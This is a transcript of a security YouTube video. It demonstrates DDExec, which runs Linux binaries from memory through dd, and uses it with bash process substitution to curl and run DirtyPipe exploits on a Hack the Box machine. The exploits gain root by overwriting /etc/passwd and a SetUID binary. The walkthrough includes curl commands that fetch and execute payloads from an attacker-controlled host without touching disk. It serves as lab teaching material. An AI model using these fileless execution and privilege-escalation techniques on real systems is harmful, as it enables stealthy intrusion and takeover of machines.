What's going on, YouTube? So this is a clip I recorded after doing a live stream with Carlos, the creator of Hack Tricks, Privilege Escalation Script Awesome Suite, and now Purple Panda, which is a tool for assessing the cloud, and his friend Yago, who is just a reverse engineering wizard. He created the script DDExec, which allows us to use the DD binary to essentially exploit itself and execute other Linux binaries. So I want to do a quick video just highlighting how to use the script and how I would use it to do boxes, because it allows us to execute exploits such as DirtyPipe without ever dropping that elf file on the box itself. It just curl it and execute straight from memory. It's really cool, so let's jump in. Before we get into anything too technical, I want to highlight that reflectively executing elf files out of memory isn't exactly new. If I just go to ipsec.rocks, type memory elf, you come to this Nightmare v2 video, which is from like 2018, so 4 years ago we showcased it. And I think it used this blog post, which I believe uses like Perl and Python to do a memfd create, write, potentially fork it, and exec it. This method works really well. The one thing that I really like about what we're going to show in this video, this DDExec, if we go all the way to the top, by arget13, is it's a living off the land method. So it uses the binary DD to exploit itself essentially and get code execution. So it's pretty cool. It only requires these binaries be on the box. The one that may not be is DD. Everything else is pretty like standard. But I have seen like containers that don't have Python or Perl installed because they're very minimal, but it probably has DD installed and it has everything else installed as well. So I really like this technique. The main reason I'm creating this video is I think the example he has on the site, it's kind of hard to like weaponize it if you don't know something called process substitution, which this video is pretty much going to showcase. So let's get into this. Let's just git clone this and we'll walk over the steps so hopefully people can understand it. So if I go into DDExec, we can copy his example, and we see it's going to base64 encode bin ls, pipe it into DDExec, and then this is just sysargv, and in Linux, the very first thing is going to be, I want to say file name, maybe process name, I don't know exactly what it's called, but this is what's going to show up if you look at like the output of PS, and this is the argument. So we just did lsla. I think if I add like an n in, we can see slightly different things. Instead of like my username, it's now ID to prove. It all works. In order to show what it looks like in a PS output, it's probably easier to change this to sleep. So where is sleep? User bin sleep. So instead of ls, I'm going to do sleep. I'm going to sleep for 60 seconds. And I'm going to call this please subscribe, right? So now if I do a ps-ef --forest, we can see it easily right here. Bash to DDExec, and it's executing bin please subscribe. And if I ls this file, it's not going to exist because it's in memory. And then for 60 seconds. If I looked at like the proc directory, ls/proc, this pid, la, you can see its executable is set to just bash. I'm sure if we extracted the heap, we would see the actual sleep binary here. And if you don't know how to do that, I'd go to ipsec.rocks and search for, let's see, forensics, Linux. Here we go. This video, basic Linux memory forensics, showcases all that type of stuff. But that would probably take too long to include in this video. So the issue I have with this now is the main reason of this is we want to run an elf file on our target without touching disk. And right now, it requires the elf file to be there because we got a base64 it. And the reason why we do this is we're passing it in a argument, and if there's a null byte, which there's always going to be for an elf file, it's going to terminate that string, so badness happens. That's why we base64. So number one, we'd have to upload the elf there. Number two, the issue is we'd also have to have DDExec on the box. However, we can use like process substitution to remove that. And Process substitution is really cool. I think it's like one of the things I didn't really know about until I did this. But if I do less on who am I, this isn't going to work because this is just doing process execution. It's going to execute who am I and pass the results of that, which is IPsec, to the less binary. So if I did like echo, please subscribe to IPsec, then now this less command, it's going to translate to IPsec, which is a file on disk, and we can read it. That shouldn't really be a surprise. So I removed it, and there we have it. So the process substitution, we changed this dollar to a less than sign, and now it's going to run this command and send it to less itself. So it's a file descriptor right here. If I do -f, so less can view file descriptors, we have IPsec. Right now it's devfd63, right? So what this allows us to do is if we go back to our DDExec command, we can now put curl here, right? So we could do curl 10.10.14.8. We can do port 8000, ddexec.sh. So now bash will be executing ddexec.sh, and all we have to do here is have base 64. So let's go and do ls again. So I'm going to make dir dub. We'll go into that, and I'm going to base 64-w0 bin ls to ls.b64. And we also want to copy ddexec here. So cp ... ddexec, and then ddexec.sh to this directory. So we have two files here, python3-m http.server, and over here we can curl, right? So I can do a curl 10.10.14.8 8000 ls.b64, and when we run this, we can see it gets ddexec and gets ls, and I still have 60 here because that's when I was using sleep. But if I add a la, we should have the normal ls output we're used to. So now we can combine this and take something like DirtyPipe and run DirtyPipe on a target system without touching disk. So I'm going to SSH into altered. This is a box I had created for the Ultimate Hacking Championship and now exists on Hack the Box. And I'm going to type the password I know because I created the box. I hope I typed it right. There we have it. So this is vulnerable to DirtyPipe. So let's go and download the exploit. So DirtyPipe, go to Google, and we'll just do this one for a basic proof of concept. We'll probably do the three I show in my video for altered, because I think doing all three makes a lot of sense. So I'm going to v dirtypipe.c, paste it in, gcc it, out, we'll just call it DirtyPipe, and then we have to base 64 it, so base 64, DirtyPipe, w0, and DirtyPipe.b64. Now, this particular exploit requires us to say target file, the offset, and what we want to write against it, right? So I'm going to start up my Python 3 web server, and I'm going to go to where this curl command is. And let's see. So I'm going to have this to be DirtyPipe.b64. And we're going to say, actually, before I do this, we should look at the contents of passwd, because I don't think I reverted this box. So something weird is going to be here. Tail-1, or should do head. Head-1, yeah. This has already been exploited, but all we want to do is change this O to be a capital O. So it doesn't really matter for this. I'm going to do etc passwd, the offset of 1, and I'm going to put it as a capital O, and then we're going to view that. So that is offset 1 right there. We can see the two downloads here. DirtyPipe is running. And I made a mistake. So I only pass it a few arguments because I didn't put the actual file name here. So let's do bin please subscribe. So now we'll rerun it. Once this finishes, it says it worked. If I head -1, we can see we overwrote that file. If I go here, we can say GitHub DirtyPipe. Do I have one? Let's see. Is this one it? I think this one's it. I think exploit 1 is going to be the one that we see here that puts Aaron, right? Maybe not. I'm going to Google DirtyPipe GitHub Aaron. Run this. So I think this is the one that was ran on the box because it's going to write the passwd thing here, right? So I'm going to replace this command. So we're going to write a password of IPsec so we know it actually worked. So if I go back here, let's do www wget and then exploit.c. That's not what I want. I want raw. So go up here, raw, rm exploit wget, and now we can search for Aaron, and I probably should have just grepped Aaron on exploit.c, and I'm going to copy this, and we'll put the salt as IPsec and the password as IPsec. There we go. So now we'll know if this exploit worked. This may actually not work. It's going to really screw with the passwd file. It's one of the things I hate about this exploit, but we'll see what happens. Thankfully, this is Hack the Box, where we're doing this to learn. So let's see. Put this. They added a \n at the end, right? I actually just want to edit this hash. There we go. So now we are replacing the password with IPsec and hoping this works, right? gcc exploit.c, and I'm going to call this dpipe. Sure. base64-w0 dpipe, and we'll put it to dpipe.b64. And again, we're looking at this. We want to reset passwd. So I'm putting a lowercase o there now. Let this run. Okay. So let's change this binary. Instead of dirtypipe.b64, we called it dpipe.b64. And hopefully it changes the password to be IPsec. If I head -1 the file, we do see it looks like this works. If I like head -3, because this is a like file write where we insert data, we don't append it, we overwrite data, you can see like our passwd file is all sorts of screwed up, right? But if I did su- and typed, oh, well, I can't because this box, I have a module on called Pam Wordle. So in order to run the su command, you have to play a game of Wordle that has a hacking dictionary. Let's try hacks here. So I know it has an H and it ends in K. I don't exactly know the dictionary off the top of my head. Oh, it doesn't end in K. Has a K here. But I'm not going to play the game. We're just going to say a bunch of words so you can see what the word is, and we're going to do another way around it. So that word was CMake. And if I put the password of IPsec here, it's not going to work. Let's pop this box another way. And I think... Okay, I don't have it. I thought I may have had a second privesc already on this, but I don't. So let's do something that modifies a SetUID thing to create another SetUID called tempsh, that is bash. So if we go back to DirtyPipe, let's go to a Google DirtyPipe GitHub. And let's see. We don't want Aaron, right? We want like exploit 2. I'm going to add SetUID to my search. Here we go. This one's going to overwrite a SetUID file. So I'm going to raw so we can download this. wget. And let's just GCC it. So GCC exploit 2-o. I'll call it dp-setuid. And then we can see the arguments of this. We just give it the SetUID binary we want to use, so that's good. base64-w0, and we direct this to a file, so dp-setuid.b64. And over here, we can do a curl dp setuid.b64, and I'm going to use the pkexec binary because that is SetUID, and it's got a little bit of flair to it if we use pkexec to privesc with DirtyPipe, because pkexec itself had a vulnerability not too long ago. But here we go. We executed DirtyPipe and got root without even like touching disk. So I find that to be really cool. And we'll just end this video with playing a game of Hacker Wordle, and of course cheating, because again, it's Hacker Wordle, so you have to cheat, right? So v words, there we go. And if I do su dash, let's do opsec as the password. So we know we have an s in, so I'm going to grep s on words. I'm going to try shell. We want to grep begins with, where is that? There we go. So it's one of two things, shmdt, and that's correct. So password of IPsec, because that's what we changed it to, and again, we are root. So hope you guys enjoyed this short video on DDExec. Take care, and I will see you all next time.